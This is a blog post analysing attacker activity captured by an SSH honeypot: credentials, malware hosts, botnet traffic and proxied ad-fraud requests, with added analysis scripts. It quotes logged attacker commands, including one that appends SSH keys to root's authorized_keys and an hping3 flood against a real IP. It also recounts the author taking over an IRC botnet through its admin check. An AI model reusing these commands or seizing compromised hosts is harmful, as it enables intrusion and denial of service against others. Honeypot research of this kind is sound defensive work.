Funny Honey – tracking hackers in cyberspace part 2

SSH

Now let's continue with probably the most interesting service.

First question – Who connected to our SSH?

ssh_1

Here is the top 10. Overall we got connections from 85 countries.
Interesting that the US and China are so close.
Now on to the ASN data:

ssh_2

Here is the top 10. Overall we got connections from 578 ASNs.
I thought AS18403 was interesting, but it looks like this is actually some kind of Vietnamese telecom provider and the ASN data in the database is incorrect.

I set up this honeypot in such a way that you can connect to it with any user name and password, but only with the first combination you try; all subsequent attempts with other combinations will fail. This is done so that it doesn't look weird that every user name the attacker tries is valid on your honeypot.
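
As an added illustration of that policy (example code written for this edit, not Cowrie's own authentication code): a per-source cache that accepts the first user name/password pair it sees and afterwards only that pair. Keying the cache on the source IP and bounding its size are assumptions of the example; Cowrie's real implementation differs.

```python
from collections import OrderedDict


class FirstComboAuth:
    """Honeypot credential policy: the first username/password pair a source
    IP tries is accepted and remembered; every other pair from that IP fails.
    Repeating the remembered pair succeeds again, so a bot that logs back in
    with what "worked" sees a consistent system instead of an obvious trap.

    Illustrative policy only (an assumption for this example), not Cowrie's code.
    """

    def __init__(self, max_sources=10000):
        # Bounded cache so a flood of distinct sources cannot exhaust memory.
        self.max_sources = max_sources
        self.accepted = OrderedDict()  # src_ip -> (username, password)

    def check(self, src_ip, username, password):
        """Return True if this attempt should be reported as a successful login."""
        combo = (username, password)
        known = self.accepted.get(src_ip)
        if known is None:
            if len(self.accepted) >= self.max_sources:
                self.accepted.popitem(last=False)  # evict the oldest source
            self.accepted[src_ip] = combo
            return True
        return combo == known


def simulate(auth, attempts):
    """Replay (src_ip, username, password) attempts; return the outcome list."""
    return [auth.check(ip, user, pw) for ip, user, pw in attempts]


if __name__ == "__main__":
    # Constructed attempts (RFC 5737 documentation address) for a quick demo.
    demo = [("198.51.100.7", "root", "123456"),
            ("198.51.100.7", "root", "password"),
            ("198.51.100.7", "root", "123456"),
            ("198.51.100.8", "admin", "admin")]
    print(simulate(FirstComboAuth(), demo))
```

The cache never needs the real password, so it can be swapped for a hash of the pair if the log store is shared with other tooling.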
Next question – What are the most common successful login usernames?

ssh_3

Here is the top 10. Overall we got 187 unique user names.
I guess it's not really surprising, but you can clearly see that there are a lot of attacks against IoT devices such as home routers. I don't think there is much point in bruteforcing root nowadays, since root login is usually disallowed by default on many systems. There are a couple of other interesting ones:

  • admin – this username is commonly used on home routers
  • ubnt – the default user name on Ubiquiti Networks routers
  • pi – the default user name on the Raspberry Pi Raspbian distribution
  • vagrant – the default user name for Vagrant, a system developers use to create automated VMs
  • curis – this one is curious; I haven't found what it is, but there is a US biotech company with the same name that makes cancer treatment drugs. Could be some kind of medical device?
  • support – could be anything; I haven't found anything conclusive.

Let's see if there are any other interesting usernames.

  • Fortimanager_Access – this is for the recently found SSH backdoor in Fortinet devices
  • abangela – this is one of my fake FBI employees who got an account on the system; interesting.
  • nmis – this is for the Opmantek NMIS Network Management System
  • PlcmSpIp – this is for Polycom SIP phones
  • mapred – this is for the Cloudera Hadoop distribution
  • dspace – possibly for DuraSpace DSpace, a repository software
  • boomi – possibly for Dell Boomi cloud services
  • openproject – this is for OpenProject, open source project management software
  • mittel_math – don't know what this is, but it translates from German as "medium math"

There is also other stuff like TeamSpeak, JBoss, DB2, Oracle E-Business Suite, MythTV, Minecraft, Jira, Redmine, cPanel, svn and git.
Next question – What are the most common failed login usernames?

ssh_4

Here is the top 10. Overall there are 5768 unique usernames.
The stats are different here: developer services like source code management and build servers seem to be targeted more.
There is not much interesting stuff in the other names: more various DBs like informix, mongodb and couchdb, lots of names, lots of generic words and some junk too.
Another cool thing to do is to compare this list to some common user name list and see how many of those match, but unlike password lists, I don't know any good user name lists to do this with. If you know a good and commonly used list, please leave a comment.
Instead, I have a couple of users in my /etc/passwd and also a file which is used like a user database, which is in fact a real-life FBI leak of usernames and passwords, a snippet of which you saw in the first part. Unfortunately, there were no logon attempts under any of those users except for abangela.

Next question – What are the most common successful passwords?

ssh_5

Here is the top 10. Overall there are 323 unique passwords.

There is nothing interesting in the passwords themselves, so let's see how many of them we can find in common password wordlists.
I will be checking passwords against the 10k_common_list, rockyou and Ashley Madison lists.

ssh_6

So, it looks like about 20% of our passwords can be found in 10k common, about 22% in the Ashley Madison list and about 32% in rockyou. That's interesting; it appears attackers don't use very common wordlists. Manual checking also confirms this, as I got passwords like frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ, which is either a shitty password list or they may be onto something…
Googling for this password doesn't reveal much – some hits where this value was used as a salt, and this value used as ps4passcode in Unity video game projects; don't know what this means.
The password !@ is also interesting. I saw it hardcoded into some monitoring scripts on GitHub, but wasn't able to find more.

Next question – What is the most common failed password?

ssh_7

Here is the top 10. Overall we got 22828 unique passwords attempted.
No real surprises with the top passwords, but I thought the number of unique passwords would be way higher, maybe in the hundred thousand range.
A cursory glance over this dataset doesn't reveal much other than the fact there is a lot of junk in it, including very random ones, like you would get out of a password manager. Googling some of those random passwords reveals only other sources that confirm SSH bruteforce activity with those passwords, like SANS DShield, and nothing more. I think it's just some shitty password list that those bots reuse. Don't tell me you believe someone would use 42:be:18:14:e5:75:24:bc:ed:70:f3:fa:9f:de:6a:7e or 5faWed2ff8aA116e3X1faZ0I0f719Qf40obe as a regular password. I mean, I use passwords like this all the time, but there is no point bruteforcing randomly generated passwords.
Now let’s do the same wordlist analysis.

ssh_8

So, most of our failed passwords are unique and less than 1% of them are found in public wordlists. Well, considering the set contains mostly useless junk passwords, it's not a real surprise.
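
Here is a worked version of the wordlist comparison from the successful-password section above, together with a heuristic for the generated-looking junk discussed in this one (example code added for this edit, not the post's own analysis). The embedded wordlist and most of the sample passwords are constructed; the three long strings are the ones quoted in the post. `load_wordlist` is there for real lists such as rockyou, which the example does not ship, so it runs offline against the small stand-in set.

```python
import math
import re
from collections import Counter

# Constructed stand-in for a public wordlist (rockyou etc. are far larger).
COMMON_WORDLIST = {"123456", "password", "admin", "root", "12345678", "qwerty",
                   "letmein", "1234", "raspberry", "ubnt"}

# Constructed sample of attempted passwords; the three long ones are the
# oddities quoted in the post, the rest are made up for this example.
OBSERVED = ["123456", "password", "admin", "!@", "ubnt", "raspberry",
            "frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ",
            "42:be:18:14:e5:75:24:bc:ed:70:f3:fa:9f:de:6a:7e",
            "5faWed2ff8aA116e3X1faZ0I0f719Qf40obe", "support", "Passw0rd!"]


def load_wordlist(path, encoding="latin-1"):
    """Read a newline-separated wordlist into a set (rockyou is not clean UTF-8)."""
    with open(path, encoding=encoding, errors="replace") as fh:
        return {line.rstrip("\n") for line in fh}


def coverage(passwords, wordlist):
    """Fraction of *unique* observed passwords that appear in the wordlist."""
    uniq = set(passwords)
    return len(uniq & wordlist) / len(uniq) if uniq else 0.0


def shannon_bits_per_char(s):
    """Per-character Shannon entropy; random-looking strings score high."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


# MD5-style SSH host key fingerprint (16 colon-separated hex bytes).
FINGERPRINT_RE = re.compile(r"^([0-9a-f]{2}:){15}[0-9a-f]{2}$")
CLASS_PATTERNS = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")


def looks_generated(pw):
    """Heuristic for 'junk' candidates: an SSH fingerprint pasted as a password,
    or a long string mixing three character classes with high per-character
    entropy, i.e. password-manager output or a botched list export."""
    if FINGERPRINT_RE.match(pw):
        return True
    classes = sum(bool(re.search(p, pw)) for p in CLASS_PATTERNS)
    return len(pw) >= 20 and classes >= 3 and shannon_bits_per_char(pw) >= 3.5


def summarize(passwords, wordlist):
    """Unique count, wordlist coverage and the generated-looking candidates."""
    uniq = set(passwords)
    return {"unique": len(uniq),
            "coverage": round(coverage(passwords, wordlist), 3),
            "generated": sorted(p for p in uniq if looks_generated(p))}


if __name__ == "__main__":
    print(summarize(OBSERVED, COMMON_WORDLIST))
```

Coverage is computed over unique passwords so that one password repeated by a thousand bots does not dominate the percentage; if you want the attempt-weighted figure, pass the raw list through `Counter` first.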
Next question – Has anyone accessed the “classified” data?
Of course! Most of the attacks are automated, so they are going to miss our files, but there were a couple of guys who accessed and tried to copy our secret files. I thought there would be more of them, honestly.

hacker

He also tried to copy files, but it seems he is not a very skilled Linux user (scp -f and rsync --server --sender are the remote-side invocations that the scp and rsync clients spawn over SSH, not commands you type yourself):
scp -r -f /fbi
scp -r -f /fbi
scp -f /fbi/*
rsync --server --sender -logDtprze.iLsf . /fbi

Let's see where those guys are from:
188.24.201.117|AS8708 RCS & RDS SA|Romania
188.24.227.146|AS8708 RCS & RDS SA|Romania
209.126.247.39|AS10439 CariNet, Inc.|United States
2.229.43.84|AS12874 Fastweb SpA|Italy

Two of those are consumer ISPs, so there is a possibility they connected directly from their home PCs. The other guys looked at some files and immediately disconnected; got scared of the FBI? 🙂
Next question – Is there anything interesting in the commands?
Well, not really. Most of the commands are related to downloading and manipulating malware. There were a couple of more interesting ones:
Looks like some guy got confused why his perl script wasn't running and accidentally copied the valgrind example from a Stack Overflow question about segfaults in perl scripts:
valgrind perl ./yourfaultyscript.pl
Another one added his ssh keys:

echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIB8NTwrTVNx8KZwzNj067GiIfz8Vc2DgqvmEatkwH1hjiM/jdrq2VFEAJI75AIdarHo1jVL7ZcpsmiIJQ3Pi+P0JdAXARK8PJEZyRQJLJusucbJeU9FI4drnPceKKthaSjVl/9bWa6ckmrYaFIfnNZtAH9CAWn6TCGb5lDfKdgC5Q== awsnext" >> authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEA3nB0UKB+AEFq9UJIkPcfxKiStiPCzB8n1Z/jx3zjlJaiKZAHetGJuT9W9wtGjNYPQ7D5qNvCKO9u+Mpv5VFyaAyRZUkP2SrJ/120QbFr+loUItvptGi3LlFlYravutXMsst2+w+oiqWhJYEqmwCl5JO2m56avQQMaevnKwexH4EobCIWNxVzGL54zXGOtf/0pK+IEL7fRy/WAQmjT23XJTJr7OGx09rdhzxRMxyk7a0XK5MW3MOY9SLqn7iDe2mQ0yDZcsM5CtuggB0r2AtapifPWFtoRYBjUrFNL1P5nOhc4jHEtlFtlVpIchO2aOJLRg1nYT/ndGb9bC23/ubpSQ== root@libre" >> /root/.ssh/authorized_keys

That key was used in a script file on some Romanian site.
Yet another one installed hping and launched a ping flood against some host in Romania:
hping3 -1 --flood 89.136.79.211

Next question – Where is the malware hosted?
Since most of the commands are malware related, let's see where this malware is hosted. Overall we got 121 malware URLs.

ssh_9

And for ASN:

ssh_10

Here is the top 10. Overall we got 52 ASNs, mostly hosting providers.

Other insights from this data:

  • Most of the URLs use HTTP and connect directly to an IP address instead of a domain name. Very few use FTP or HTTPS.
  • Most of them also use non-standard ports instead of the regular port 80.
  • As for the domains used, here is a breakdown of TLD zones. They also like to abuse free .tk domains.
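The three observations above can be computed straight from the URL list with standard-library parsing. The code below is an added example (not the post's own scripts); the URLs in it are constructed, using RFC 5737 documentation addresses and example.* names rather than real malware hosts.

```python
import ipaddress
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample URLs (made up for the example, not the post's data).
MALWARE_URLS = [
    "http://203.0.113.10:8080/bins/x86",
    "http://203.0.113.10:8080/bins/arm",
    "http://198.51.100.23/wget.sh",
    "ftp://198.51.100.23:21/bot.pl",
    "http://example-drop.tk:1337/irc.tgz",
    "https://cdn.example.net/update.sh",
    "http://updates.example.com:8888/x86",
]

DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21}


def describe(url):
    """Break a download URL into the fields the breakdowns above rely on."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)
        is_ip = True
    except ValueError:
        is_ip = False
    # urlsplit gives None when no explicit port; fall back to the scheme default.
    port = parts.port or DEFAULT_PORTS.get(scheme)
    return {
        "scheme": scheme,
        "host": host,
        "is_ip": is_ip,
        "port": port,
        "nonstandard_port": port != DEFAULT_PORTS.get(scheme),
        "tld": None if is_ip else host.rsplit(".", 1)[-1],
    }


def breakdown(urls):
    """Scheme, IP-vs-domain, non-standard-port and TLD tallies for a URL list."""
    rows = [describe(u) for u in urls]
    return {
        "schemes": Counter(r["scheme"] for r in rows),
        "ip_literal": sum(r["is_ip"] for r in rows),
        "domain": sum(not r["is_ip"] for r in rows),
        "nonstandard_port": sum(r["nonstandard_port"] for r in rows),
        "tlds": Counter(r["tld"] for r in rows if r["tld"]),
        "hosts": Counter(f'{r["host"]}:{r["port"]}' for r in rows),
    }


if __name__ == "__main__":
    for key, value in breakdown(MALWARE_URLS).items():
        print(key, value)
```

The `hosts` counter (host plus effective port) is the useful pivot for abuse reports and blocklists, since one dropper IP typically serves several architecture-specific binaries from the same non-standard port.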

ssh_11

Next question – What types of files were downloaded?

ssh_12

Here is the top 10. Overall we got 23646 files downloaded. Not all of them were downloaded via HTTP, since Cowrie also implements SFTP; that's why there is a discrepancy with the URL analysis, plus there were also a lot of duplicates.
Looking over some of those files I've got lots of scripts that download the same malware, same for the malware binaries themselves, a few lame perl DoS scripts, a few password lists and IP lists for DoS bots, but overall – nothing very interesting.
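
One way to get the duplicate count and a file-type breakdown for a directory of honeypot downloads is to hash each file and sniff its first bytes. The code below is an added example, not the post's own tooling; the sample "files" are constructed byte strings standing in for real downloads, and the sniffing covers only the handful of types the post mentions (ELF binaries, shell and perl scripts, archives, plain-text lists).

```python
import hashlib
from collections import Counter

# Constructed sample "downloads": byte strings standing in for saved files.
SAMPLES = {
    "dl_001": b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8 + b"\x02\x00\x03\x00",  # ELF32
    "dl_002": b"#!/bin/sh\ncd /tmp; wget http://203.0.113.10:8080/bins/x86\n",
    "dl_003": b"#!/bin/sh\ncd /tmp; wget http://203.0.113.10:8080/bins/x86\n",  # dup
    "dl_004": b"#!/usr/bin/perl\nuse IO::Socket;\n",
    "dl_005": b"\x1f\x8b\x08\x00" + b"\x00" * 6,                                  # gzip
    "dl_006": b"123456\npassword\nadmin\n",                                       # text
}


def classify(data):
    """Cheap magic-byte/shebang sniff; enough to bucket honeypot downloads."""
    if data.startswith(b"\x7fELF"):
        # EI_CLASS byte: 1 = 32-bit, 2 = 64-bit.
        return "ELF" + {1: "32", 2: "64"}.get(data[4], "?")
    if data.startswith(b"#!"):
        interp = data.split(b"\n", 1)[0][2:].decode("ascii", "replace").strip()
        words = interp.split()
        if not words:
            return "script:?"
        # "#!/usr/bin/env python" -> python; "#!/bin/sh" -> sh
        prog = words[1] if words[0].endswith("/env") and len(words) > 1 else words[0]
        return "script:" + prog.rsplit("/", 1)[-1]
    if data.startswith(b"\x1f\x8b"):
        return "gzip"
    try:
        data.decode("utf-8")
        return "text"
    except UnicodeDecodeError:
        return "binary"


def triage(files):
    """Dedupe by SHA-256; return {sha256: {"type": ..., "names": [...]}}."""
    out = {}
    for name, data in files.items():
        digest = hashlib.sha256(data).hexdigest()
        entry = out.setdefault(digest, {"type": classify(data), "names": []})
        entry["names"].append(name)
    return out


def type_counts(files):
    """Type breakdown over *unique* content, so duplicates are counted once."""
    return Counter(entry["type"] for entry in triage(files).values())


if __name__ == "__main__":
    print(type_counts(SAMPLES))
    for digest, entry in triage(SAMPLES).items():
        print(digest[:12], entry["type"], entry["names"])
```

Counting over unique hashes rather than file names is what separates "23646 files" from "how many distinct things were actually dropped"; the hash also doubles as the lookup key for the AV verdicts in the next section.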
Next question – What type of malware was downloaded?

ssh_13

Here are the top 10 results by Kaspersky. Overall we got 43 unique verdicts.
Obviously not everything is detected and not every file is malware.
Here is the top 10 for Avast.

ssh_14

This is commodity Linux malware, usually various IRC based botnets, that you can read about just about every day on http://blog.malwaremustdie.org/
Most of those are used to perform DDoS and SSH bruteforce attacks.

Botnet story

Some time ago I looked into one of those botnets, called “BadLuckJosh”, which is still spreading today.
It spreads by doing SSH bruteforce and uploading some binaries or a perl script; then the infected bots do the same.
Here is an example of this botnet. Stage 1, the downloader shell script:

ssh_15

So, at one point I got a perl script that was also used as part of this botnet. It also had really simple authentication – the bot joined an IRC channel on some IRC server and looked for certain user names designated as admins. To those users it would immediately grant shell access.
Here is part of this script:

ssh_16

So I joined under one of those names and got control of about 200 bots, mostly routers and Raspberry Pi devices.
Here is an example of the commands that bots accept:

ssh_17

It can launch DoS attacks, do port scans, do SQL injections and other stuff.
Here is an example of shell access via IRC:

ssh_18

Also note this is a fat server, not a router.
I also collected partial hostnames from the IRC log, but full hostnames aren't visible and I was able to collect them only for 50 hosts. But it's enough to do some analysis.
Let's see what domain zones our bots present:

ssh_19

Here are the top 10 TLDs for bots. Overall we got 13 unique TLDs.
Most of those devices are all over the world and their hostnames map to some generic ISP reverse DNS names.
Let's try to get the ISP for those bots:

ssh_20

Here is the top 10. Overall we got 31 unique ISPs.

Bots also had a command to destroy themselves. Since they also didn't have persistence, I quickly threw a script together to kill all the bots.

ssh_21

Here the bots started to die off:

ssh_22

It’s done.

ssh_23

Two of their C2s were hosted on OVH, so I reported them to OVH abuse, but never heard back. Which is not really surprising; OVH is notoriously botnet friendly and ignores abuse reports. So I also reported them to the French CERT, which also didn't really help, as this is what I got in response:

ssh_24

What's the point of having a national CERT without any authority? From my experience even some commercial CERTs can react fast due to arrangements with domain registrars and ISPs.
I could have gone out of my way and reported this to some private contacts and got it cleaned up, but what's the point? Unfortunately, since they bruteforce default credentials, they rebuilt the botnet in a day. I was tempted to change the passwords myself, but this would probably be too disruptive to the users, so I didn't.

Next question – What SSH client version was used?

ssh_25

Here is the top 10. Overall we got 83 unique client versions.
libssh is commonly used by bruteforcing bots; other than that, there are some other libraries for languages like Python, Erlang and C#, and tools like Medusa and nmap.

Cowrie also has an interesting feature: it emulates an SSH proxy and forwards connections elsewhere.
Next question – Where were connections forwarded?

ssh_26

Here is the top 10. Overall we got 103 countries.
And for the ASN data:

ssh_27

Here is the top 10. Overall we got 1256 ASNs.

Next question – What types of services were proxied?

ssh_28

Here is the breakdown. Most of it is web and email related, presumably for sending spam and using this server as a proxy for browsing the web. There are a couple of non-standard ports as well.
Next question – What hosts were accessed the most?

ssh_29

Here are the top 10 hosts. Overall we got 6156 hosts accessed.
Next question – Is there anything interesting in the payload?
The cool feature is that Cowrie also logs the payload of these forwarding requests.
Nothing interesting in the other data, so let's focus on the HTTP data. There are all kinds of requests, all 323739 unique of them.
However, a lot of them seem advertising related and look like this:

'GET /analytics.js HTTP/1.1\r\nHost: http://www.google-analytics.com\r\nConnection: keep-alive\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36\r\nReferer: http://www.3fatchicks.com/forum/alternachicks/168984-help-eyebrow-piercing.html\r\nAccept-Encoding: gzip,deflate\r\nAccept-Language: en-us,en;q=0.8\r\n\r\n'
'GET /2.0/733/adtag.js HTTP/1.1\r\nHost: tags.tagcade.com\r\nConnection: keep-alive\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36\r\nReferer: http://www.funimation.com/shows/haganai\r\nAccept-Encoding: gzip,deflate\r\nAccept-Language: en-us,en;q=0.8\r\n\r\n'
'GET /a/h/vZX9NUPEHHiF12jWeI6Y44NEDuSEpViIcDt29RP7ti1l7M4y+Qq0lTxfMrOaJxQvevQUiH2eRZA=?cb=644696702249348200&pageUrl=http%3A%2F%2Fwww.wwmt.com%2Ftemplate%2Finews_wire%2Fwires.national%2F33651c67-www.wwmt.com.shtml&description={DESCRIPTION}&duration=120&id=__random-number__&keywords={KEYWORDS}&title={TITLE}&url=VIDEO_URL&eov=eov HTTP/1.1\r\nHost: ads.adaptv.advertising.com\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36\r\nOrigin: http://www.wwmt.com\r\nAccept: */*\r\nReferer: http://www.wwmt.com/template/inews_wire/wires.national/33651c67-www.wwmt.com.shtml\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.8\r\n\r\n'

Not sure what this is; could be some kind of ad fraud?
Here are the top 10 sites based on the Host header:

ssh_30

As you can see, most of those are related to advertising.

Here are the top 10 user-agents:

ssh_31

Nothing interesting here.

Here are the top 10 sites in the Referer:

ssh_32

They seem to fake the Referer to various legitimate sites, so the traffic would look real. This also confirms some kind of ad fraud scheme. Nothing interesting other than that.
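
Putting the forwarding analysis together, the added example below (written for this edit, not the post's code) labels forwarded destination ports by service and parses raw HTTP request payloads to tally Host, User-Agent and Referer sites. The payloads and port list are constructed, modelled on the captures quoted above; the port-to-service table is a small mapping chosen for the example, not Cowrie output.

```python
from collections import Counter
from urllib.parse import urlsplit

# Constructed payloads modelled on the captures quoted above (not the post's data).
PAYLOADS = [
    "GET /analytics.js HTTP/1.1\r\nHost: www.google-analytics.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1) Chrome/48.0\r\n"
    "Referer: http://forum.example.com/thread/1\r\n\r\n",
    "GET /2.0/733/adtag.js HTTP/1.1\r\nHost: tags.example-ads.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1) Chrome/48.0\r\n"
    "Referer: http://video.example.org/shows/1\r\n\r\n",
    "GET /a/h/abc?cb=1 HTTP/1.1\r\nHost: ads.example-ads.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.2) Chrome/47.0\r\n"
    "Referer: http://news.example.net/story\r\n\r\n",
    "EHLO mail.example.com\r\n",  # SMTP, not HTTP: must be skipped, not crash
]
# Constructed destination ports of forwarded (direct-tcpip) connections.
FORWARD_PORTS = [80, 80, 443, 25, 25, 25, 8080, 110]

# Small service table (an assumption of the example); anything else is "other".
PORT_SERVICES = {25: "smtp", 80: "http", 110: "pop3", 143: "imap",
                 443: "https", 587: "submission"}


def parse_http_request(raw):
    """Return method/path/headers for a raw HTTP request, or None if it isn't one."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return {"method": parts[0], "path": parts[1], "headers": headers}


def service_breakdown(ports):
    """Map forwarded destination ports to service labels and count them."""
    return Counter(PORT_SERVICES.get(p, f"other:{p}") for p in ports)


def http_summary(payloads, top=10):
    """Top Host, User-Agent and Referer sites across the HTTP payloads."""
    reqs = [r for r in map(parse_http_request, payloads) if r]
    hosts = Counter(r["headers"].get("host", "") for r in reqs)
    agents = Counter(r["headers"].get("user-agent", "") for r in reqs)
    # Referer is reduced to its hostname so one site with many pages counts once per request.
    referers = Counter(urlsplit(r["headers"].get("referer", "")).hostname or ""
                       for r in reqs)
    return {"http_requests": len(reqs),
            "hosts": hosts.most_common(top),
            "user_agents": agents.most_common(top),
            "referer_sites": referers.most_common(top)}


if __name__ == "__main__":
    print(service_breakdown(FORWARD_PORTS))
    for key, value in http_summary(PAYLOADS).items():
        print(key, value)
```

Comparing the Referer site tally against the Host tally is what surfaces the pattern described above: a handful of ad-tag hosts requested on behalf of a long tail of unrelated publisher sites.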


3 comments

  1. Really interesting series. Thanks for posting. I'd be interested to see a post with some more details about the honeypot itself if possible.


  2. The type of services proxied is interesting. I've been running my own honeypots for the last couple of months and have seen a large amount of port 25 proxying. Installing mailoney and using cowrie to forward the connections to it shows that they are trying to send blank emails, which is quite strange.
